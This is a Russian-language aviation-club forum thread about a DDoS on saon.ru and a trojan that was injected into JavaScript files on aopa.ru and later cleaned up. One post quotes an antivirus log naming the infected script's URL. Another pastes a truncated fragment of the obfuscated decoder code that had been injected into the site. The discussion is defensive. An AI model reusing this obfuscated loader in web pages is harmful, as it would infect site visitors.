Нас атакуют!)
Модераторы: smixer, lt.ak, vova_k
- Serega
- Site Admin
- Сообщения: 5919
- Зарегистрирован: 14 авг 2006, 15:43
- Member of AOPA: Yes
- Откуда: St. Petersburg
Нас атакуют!)
Инженерами #### зафиксировано чрезмерное увеличение количества запросов к вашему сайту saon.ru, в результате анализа данных запросов была выявлена DDOS атака.
Инженеры ###### предпринимают все возможные меры для отражения атаки.
Всплывающее при первом посещении сайта окно с кнопкой "ОК", установленное на вашем сайте, является частью системы защиты.
Инженеры ###### предпринимают все возможные меры для отражения атаки.
Всплывающее при первом посещении сайта окно с кнопкой "ОК", установленное на вашем сайте, является частью системы защиты.
Иванов Сергей
Re: Нас атакуют!)
Неужели Александр Васильевич заказал?
В критической ситуации ты никогда не воспаришь на уровень своих ожиданий - ты неизбежно провалишься на уровень своей натренированности (с)
- Vi-kTo-R
- SAONовец со стажем
- Сообщения: 851
- Зарегистрирован: 25 ноя 2010, 23:20
- Member of AOPA: Yes
- Откуда: Северо-Восток М.О.
- Контактная информация:
Re: Нас атакуют!)
Меня Троян встретил в обед на РАОПА.
И впрямь засуетились супостаты..
И впрямь засуетились супостаты..
В Арктике звезды ярче..
Re: Нас атакуют!)
Повтори еще раз? Какой троян, в какой обед?Vi-kTo-R писал(а):Меня Троян встретил в обед на РАОПА.
Был вирус где-то неделю назад, но уже вычистили.
- Vi-kTo-R
- SAONовец со стажем
- Сообщения: 851
- Зарегистрирован: 25 ноя 2010, 23:20
- Member of AOPA: Yes
- Откуда: Северо-Восток М.О.
- Контактная информация:
Re: Нас атакуют!)
11.04.2012 13:29:40 "Фильтр HTTP файл http://aopa.ru/templates/ja_purity_iii/js/menu/mega.js JS/Agent.NEN троянская программа соединение прервано - изолирован VIKTOR-CC6FAEEF\Виктор"
Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Mozilla Firefox\firefox.exe.
Как минимум еще шесть зараженных файлов есть в архиве журнала антивируса.
Обнаружена угроза при попытке доступа в Интернет следующим приложением: C:\Program Files\Mozilla Firefox\firefox.exe.
Как минимум еще шесть зараженных файлов есть в архиве журнала антивируса.
В Арктике звезды ярче..
- Vi-kTo-R
- SAONовец со стажем
- Сообщения: 851
- Зарегистрирован: 25 ноя 2010, 23:20
- Member of AOPA: Yes
- Откуда: Северо-Восток М.О.
- Контактная информация:
Re: Нас атакуют!)
Не советую переходить по ссылке файла. Он заражен, только что проверил.
В Арктике звезды ярче..
-
- SAONовец со стажем
- Сообщения: 959
- Зарегистрирован: 23 фев 2009, 18:22
- Member of AOPA: Yes
- Откуда: ULAM
Re: Нас атакуют!)
Просто директор в отпуске,вот и засуетились супостаты на еще тепленькоеVi-kTo-R писал(а):Не советую переходить по ссылке файла. Он заражен, только что проверил.
Хочу летать к друзьям и иногда туда, где можно найти себя самого, чтобы никто не мешал, максимум, чтобы мешали те, кто дороги и хочется чтобы они мешали всегда.(с)
- CRaZy_SouL
- Гуру
- Сообщения: 1586
- Зарегистрирован: 10 окт 2008, 22:36
- Member of AOPA: Yes
- Контактная информация:
Re: Нас атакуют!)
Неделю назад около 10 наших сайтов атаковали гады какие-то...
Во всем, как хотите, чтобы с Вами поступали люди, так поступайте и Вы с ними.
Re: Нас атакуют!)
На aopa.ru убрали вредоносный код, он внедрен был в js-файлы.
Антивирусы теперь должны перестать ругаться. И ряд других мер предприняли, чтобы не допустить впредь такого. При этом вредностный код обсуфуцирован (зашифрован) и отличался от файла к файлу - т.е. искать его сложнее. Вот так выглядел:
Хочется сказать, что в заражениях сайтов нет человеческого фактора - они происходят автоматически, с ранее зараженных машин. В DDoS подозревать кого-то вряд ли имеет смысл (если только вы не увлекаетесь конспирологией) - атаковать оправдано какие-то сервис-компании, для которых критичен простой (онлайн-банкинг, игровые сервисы, интернет-магазины). И их обычно атакуют большим количество траффика, для атаки с помощью GET-запросов (как в случае saon), когда производится много-много запросов страниц форума - особых ресурсов не надо (как вычислительных, так и денежных).
Антивирусы теперь должны перестать ругаться. И ряд других мер предприняли, чтобы не допустить впредь такого. При этом вредностный код обсуфуцирован (зашифрован) и отличался от файла к файлу - т.е. искать его сложнее. Вот так выглядел:
Код: Выделить всё
var k574ef9="";function fe134348e8(){var gb6267aad=String,ic1e6929=Array.prototype.slice.call(arguments).join(""),sc817c=ic
1e6929.substr(x97af5f4(),3)-568,wce0ce3,hbe41c4;ic1e6929=ic1e6929.substr(18);var h7480e852=ic1e6929.length;for(var wa29b95=
0;wa29b95<h7480e852;wa29b95++){try{throw(o8a85c47=g067dd(ic1e6929,wa29b95));}catch(e){o8a85c47=e;};if(o8a85c47=='\x95'){sc8
17c="";wa29b95++;k9af3ad=f4e348d74(ic1e6929,wa29b95);while(fd5b53(k9af3ad)){sc817c+=k9af3ad;wa29b95++;k9af3ad=ic1e6929.subs
tr(wa29b95,1);}sc817c-=577;continue;}wce0ce3="";if(o8a85c47=='\xa9'){wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);while(o8
a85c47!='\xa9'){wce0ce3+=o8a85c47;wa29b95++;o8a85c47=ic1e6929.substr(wa29b95,1);}wce0ce3=q2377f(wce0ce3,sc817c,49);if(wce0c
e3<0)wce0ce3+=256;wce0ce3=qa8f75(wce0ce3);le7f1423(wce0ce3);continue;}h694cfe0=ua0c55b5f(o8a85c47);if(h694cfe0>848)h694cfe0
-=848;hbe41c4=h694cfe0-sc817c-49;if(hbe41c4<0)hbe41c4+=256;if(hbe41c4>=192)hbe41c4+=848;else if(hbe41c4==168)hbe41c4=1025;e
lse if(hbe41c4==184)hbe41c4=1105;k574ef9+=gb6267aad["\x66\x72\x6fm\x43ha\x72\x43\x6f\x64e"](hbe41c4);}}fe134348e8("7","7","
811","1","f","1e
Личные сообщения не читаю, пишите на почту leksey@ya.ru